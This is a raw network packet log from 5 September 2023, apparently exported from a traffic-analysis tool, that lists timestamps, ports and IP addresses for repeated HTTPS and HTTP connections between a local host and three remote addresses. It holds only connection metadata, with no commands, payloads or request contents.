Sep 5, 2023 13:01:23.254611969 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.254645109 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.254844904 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.254888058 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.254952908 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.259845972 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.259876013 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.260003090 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.260030031 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.260087013 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.264841080 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.264873028 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.265007973 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.265031099 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.265221119 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.268198967 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.268224001 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.268450022 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.268465996 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.268548012 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.270848036 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.270936012 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.271002054 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.271015882 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.271090984 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.279676914 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.279706001 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.279882908 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.279906988 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.281747103 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.281778097 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.281930923 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.281954050 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.282006979 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.282006979 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.282035112 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.282111883 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.282128096 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.285190105 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.285219908 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.285306931 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.285329103 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.285346985 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.288301945 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.288321972 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.288492918 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.288515091 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.292103052 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.292134047 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.292310953 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.292335033 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.295120955 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.295144081 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.295250893 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.295275927 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.295327902 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.295728922 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.295753002 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:01:23.295830011 CEST	49719	443	192.168.2.4	199.232.32.193
Sep 5, 2023 13:01:23.295840979 CEST	443	49719	199.232.32.193	192.168.2.4
Sep 5, 2023 13:02:22.924163103 CEST	49737	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:23.052695036 CEST	80	49737	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:23.053081036 CEST	49737	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:23.053628922 CEST	49737	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:23.185390949 CEST	80	49737	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:23.431405067 CEST	80	49737	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:23.431504965 CEST	80	49737	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:23.431525946 CEST	80	49737	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:23.431546926 CEST	80	49737	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:23.431736946 CEST	49737	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:23.432241917 CEST	49737	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:23.747433901 CEST	49738	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:23.880337000 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:23.880527973 CEST	49738	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:23.880969048 CEST	49738	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.009150982 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.302586079 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.302638054 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.302670956 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.302701950 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.302732944 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.302764893 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.302797079 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.302828074 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.302835941 CEST	49738	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.302835941 CEST	49738	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.302836895 CEST	49738	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.302860022 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.302895069 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.302896023 CEST	49738	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.302896023 CEST	49738	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.302912951 CEST	49738	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.302927971 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.302946091 CEST	49738	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.302961111 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.302980900 CEST	49738	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.302994967 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.303009987 CEST	49738	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.303024054 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.303042889 CEST	49738	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.303050041 CEST	80	49738	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.303071976 CEST	49738	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.303102970 CEST	49738	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.492629051 CEST	49739	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.621475935 CEST	80	49739	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.621659040 CEST	49739	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.621959925 CEST	49739	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.622896910 CEST	49739	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:24.752727032 CEST	80	49739	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:24.754028082 CEST	80	49739	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:25.021404982 CEST	80	49739	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:25.021457911 CEST	80	49739	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:25.021718979 CEST	49739	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:25.027235985 CEST	49739	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:25.225616932 CEST	49740	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:25.356409073 CEST	80	49740	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:25.356703043 CEST	49740	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:25.357520103 CEST	49740	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:25.359893084 CEST	49740	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:25.485555887 CEST	80	49740	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:25.487806082 CEST	80	49740	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:25.646537066 CEST	80	49740	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:25.646569014 CEST	80	49740	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:25.646702051 CEST	49740	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:25.666799068 CEST	49740	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:25.867501020 CEST	49741	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:25.995997906 CEST	80	49741	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:25.996215105 CEST	49741	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:25.996526003 CEST	49741	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:25.998500109 CEST	49741	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:26.128556013 CEST	80	49741	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:26.130363941 CEST	80	49741	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:26.401204109 CEST	80	49741	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:26.401240110 CEST	80	49741	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:26.401405096 CEST	49741	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:26.404597044 CEST	49741	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:26.623656034 CEST	49742	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:26.751969099 CEST	80	49742	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:26.752245903 CEST	49742	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:26.752743959 CEST	49742	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:26.753834009 CEST	49742	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:26.882263899 CEST	80	49742	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:26.883294106 CEST	80	49742	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:27.148981094 CEST	80	49742	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:27.149017096 CEST	80	49742	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:27.149132013 CEST	49742	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:27.155373096 CEST	49742	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:27.333154917 CEST	49743	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:27.462213039 CEST	80	49743	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:27.462589025 CEST	49743	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:27.463099003 CEST	49743	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:27.464889050 CEST	49743	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:27.591378927 CEST	80	49743	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:27.593111038 CEST	80	49743	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:27.864033937 CEST	80	49743	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:27.864068031 CEST	80	49743	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:27.864219904 CEST	49743	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:27.868284941 CEST	49743	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:28.075856924 CEST	49744	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:28.207576990 CEST	80	49744	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:28.207792997 CEST	49744	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:28.208111048 CEST	49744	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:28.209821939 CEST	49744	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:28.336607933 CEST	80	49744	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:28.338232040 CEST	80	49744	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:28.619004965 CEST	80	49744	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:28.619040012 CEST	80	49744	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:28.619221926 CEST	49744	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:28.621248007 CEST	49744	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:28.783962965 CEST	49745	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:28.912518024 CEST	80	49745	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:28.912828922 CEST	49745	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:28.913234949 CEST	49745	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:28.915260077 CEST	49745	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:29.041630983 CEST	80	49745	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:29.043687105 CEST	80	49745	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:29.344266891 CEST	80	49745	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:29.344326973 CEST	80	49745	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:29.344470024 CEST	49745	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:29.347096920 CEST	49745	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:29.524590969 CEST	49746	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:29.653542042 CEST	80	49746	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:29.653872967 CEST	49746	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:29.654974937 CEST	49746	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:29.656461000 CEST	49746	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:29.783472061 CEST	80	49746	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:29.784889936 CEST	80	49746	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:30.049473047 CEST	80	49746	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:30.049539089 CEST	80	49746	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:30.049695969 CEST	49746	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:30.051754951 CEST	49746	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:30.305722952 CEST	49747	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:30.434305906 CEST	80	49747	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:30.434528112 CEST	49747	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:30.497769117 CEST	49747	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:30.498931885 CEST	49747	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:30.626365900 CEST	80	49747	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:30.627305031 CEST	80	49747	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:30.906497002 CEST	80	49747	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:30.906534910 CEST	80	49747	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:30.906693935 CEST	49747	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:30.909008980 CEST	49747	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:31.700370073 CEST	49748	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:31.829058886 CEST	80	49748	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:31.829283953 CEST	49748	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:31.868135929 CEST	49748	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:31.869343996 CEST	49748	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:31.996678114 CEST	80	49748	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:31.997773886 CEST	80	49748	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:32.269529104 CEST	80	49748	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:32.269563913 CEST	80	49748	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:32.269639015 CEST	49748	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:32.271749973 CEST	49748	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:34.697504044 CEST	49749	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:34.826857090 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:34.827176094 CEST	49749	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:34.827600956 CEST	49749	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:34.828911066 CEST	49749	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:34.956043005 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:34.956255913 CEST	49749	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:34.957362890 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:34.957472086 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:34.957494974 CEST	49749	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:34.957530975 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:34.957555056 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:34.957562923 CEST	49749	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:34.957626104 CEST	49749	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:34.957633018 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:34.957653999 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:34.957674980 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:35.085031986 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:35.085839987 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:35.085941076 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:35.086117983 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:35.086133957 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:35.086257935 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:35.421880007 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:35.421907902 CEST	80	49749	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:35.422059059 CEST	49749	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:35.424618006 CEST	49749	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:35.624172926 CEST	49750	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:35.755808115 CEST	80	49750	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:35.756062031 CEST	49750	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:35.757108927 CEST	49750	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:35.759838104 CEST	49750	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:35.888932943 CEST	80	49750	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:35.891885996 CEST	80	49750	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:36.162883997 CEST	80	49750	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:36.162936926 CEST	80	49750	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:36.163294077 CEST	49750	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:36.166671038 CEST	49750	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:36.362627983 CEST	49751	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:36.490886927 CEST	80	49751	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:36.491117954 CEST	49751	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:36.491511106 CEST	49751	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:36.492686033 CEST	49751	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:36.619597912 CEST	80	49751	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:36.620656013 CEST	80	49751	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:36.883812904 CEST	80	49751	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:36.883862972 CEST	80	49751	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:36.884083033 CEST	49751	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:36.887567043 CEST	49751	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:37.653467894 CEST	49752	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:37.784272909 CEST	80	49752	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:37.784498930 CEST	49752	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:37.785239935 CEST	49752	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:37.786729097 CEST	49752	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:37.913739920 CEST	80	49752	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:37.915051937 CEST	80	49752	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:38.206876993 CEST	80	49752	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:38.206954956 CEST	80	49752	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:38.207221985 CEST	49752	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:38.212802887 CEST	49752	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:38.375396967 CEST	49753	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:38.507054090 CEST	80	49753	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:38.507313967 CEST	49753	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:38.509397984 CEST	49753	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:38.511251926 CEST	49753	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:38.637885094 CEST	80	49753	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:38.639657021 CEST	80	49753	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:38.906524897 CEST	80	49753	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:38.906574011 CEST	80	49753	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:38.906744003 CEST	49753	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:38.910033941 CEST	49753	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:39.098964930 CEST	49754	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:39.227293015 CEST	80	49754	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:39.227576017 CEST	49754	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:39.227941036 CEST	49754	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:39.230526924 CEST	49754	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:39.359509945 CEST	80	49754	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:39.360584021 CEST	80	49754	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:39.628711939 CEST	80	49754	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:39.628776073 CEST	80	49754	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:39.628932953 CEST	49754	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:39.634754896 CEST	49754	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:39.791939974 CEST	49755	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:39.923279047 CEST	80	49755	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:39.923451900 CEST	49755	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:39.923727989 CEST	49755	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:39.925218105 CEST	49755	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:40.052196980 CEST	80	49755	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:40.053210974 CEST	80	49755	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:40.328150988 CEST	80	49755	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:40.328222036 CEST	80	49755	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:40.328361034 CEST	49755	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:40.330380917 CEST	49755	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:40.518433094 CEST	49756	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:40.648230076 CEST	80	49756	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:40.648441076 CEST	49756	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:40.648803949 CEST	49756	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:40.649852991 CEST	49756	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:40.776906013 CEST	80	49756	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:40.777929068 CEST	80	49756	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:40.955079079 CEST	80	49756	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:40.955123901 CEST	80	49756	104.21.60.111	192.168.2.4
Sep 5, 2023 13:02:40.955399036 CEST	49756	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:40.961324930 CEST	49756	80	192.168.2.4	104.21.60.111
Sep 5, 2023 13:02:41.166831017 CEST	49757	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:41.295336008 CEST	80	49757	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:41.295675993 CEST	49757	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:41.297550917 CEST	49757	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:41.299176931 CEST	49757	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:41.430170059 CEST	80	49757	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:41.430295944 CEST	80	49757	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:41.616164923 CEST	80	49757	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:41.616200924 CEST	80	49757	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:41.616305113 CEST	49757	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:41.618910074 CEST	49757	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:41.839416027 CEST	49758	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:41.968080997 CEST	80	49758	172.67.195.229	192.168.2.4
Sep 5, 2023 13:02:41.968267918 CEST	49758	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:41.968569994 CEST	49758	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:02:41.969425917 CEST	49758	80	192.168.2.4	172.67.195.229
